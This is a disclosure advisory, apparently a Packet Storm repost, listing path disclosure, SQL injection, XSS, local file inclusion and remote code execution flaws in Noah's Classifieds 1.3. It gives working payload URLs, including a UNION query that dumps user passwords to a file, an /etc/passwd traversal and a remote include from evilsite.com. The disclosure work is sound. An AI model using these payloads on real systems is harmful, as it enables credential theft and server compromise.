Noah's Classifieds versions 1.3 and below are susceptible to path disclosure, SQL injection, cross site scripting, local file inclusion, and remote code execution flaws.
222c5ab8614a5070ec578a3880f833eec8e4283ef7b6e8203c91dc0d803fb051
KAPDA New advisory
Vendor: http://classifieds.phpoutsourcing.com
Vulnerable: Noah`s classifieds 1.3 and below
(classifieds component for mambo also may be affected)
Bug: Path Disclosure,Sql Injection,XSS,Local file
inclusion,Remote code execution
Exploitation: Remote with browser
Exploit:available
Description:
--------------------
Noah' Classifieds is a general purpose application
that allows you to set up as many ad categories as you
want specifying custom fields for each of them.
Vulnerabilities:
--------------------
Path disclosure (direct access to include files)
http://example.com/classifieds/gorum/category.php
--------------------------
--------------------------
Sql Injection: (search tool, HTTP method:POST,
condition: mysql user with file privilege)
kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#
--------------------------
--------------------------
Cross site scripting
1-
http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/gorum/gorumlib.php
if( isset($HTTP_GET_VARS["inf"]) )
$infoText=$HTTP_GET_VARS["inf"];
$sApp=$init->showApp();
$s.=$globHtmlHead;//fontos, hogy felulirhato
legyen az app-ban
---
2-
http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E
(condition:rgister_globals=On)
--------------------------
--------------------------
Local file inclusion (condition: magic_quotes_gpc=Off
For none php files )
http://example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00
/include.php
if (isset($otherTemplate)) {
include("./template$otherTemplate.php");
}
else include("./template.php");
--------------------------
--------------------------
Remote code execution (condition: register_globals=On)
http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php
/gorum/constants.php
if (!isset($upperTemplate)) $upperTemplate =
"<body>\n";
if (!isset($lowerTemplate)) $lowerTemplate =
"</body>";
/gorum/gorumlib.php
if (ereg("\.php$",$upperTemplate)) {//just check
$ret=@fopen($upperTemplate,"r");
if (!$ret) {
$infoText =
sprintf($lll["incl_header_err"],$upperTemplate);
}
@fclose($f);
}
if (ereg("\.php$",$lowerTemplate)) {//just check
$ret=@fopen($lowerTemplate,"r");
if (!$ret) {
if (!isset($infoText)) $infoText="";
$infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate);
}
@fclose($f);
}
.
.
.
$upperTemplate=trim($upperTemplate);
if (ereg("\.php$",$upperTemplate)) {
$ret=@include($upperTemplate);
}
else $s.="$upperTemplate\n";
$lowerTemplate=trim($lowerTemplate);
$s.=$sApp;
if (ereg("\.php$",$lowerTemplate))
$ret=@include($lowerTemplate);
else $s.="$lowerTemplate\n";
}
More details with Exploit
---------
http://www.kapda.ir/advisory-268.html
In Farsi: http://irannetjob.com/content/view/198/28/
Solution:
---------
There is no vendor supplied patch for this issue.
>From Vendor`s website:
"Currently, we are completely overloaded with our
running projects,
and we don't have enough time to deal with our free
products.
The further development and support of Noah's
Classifieds is therefore suspended.
Thank you for the understanding and please forgive us
that we don't responding to the emails."
Credit :
---------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed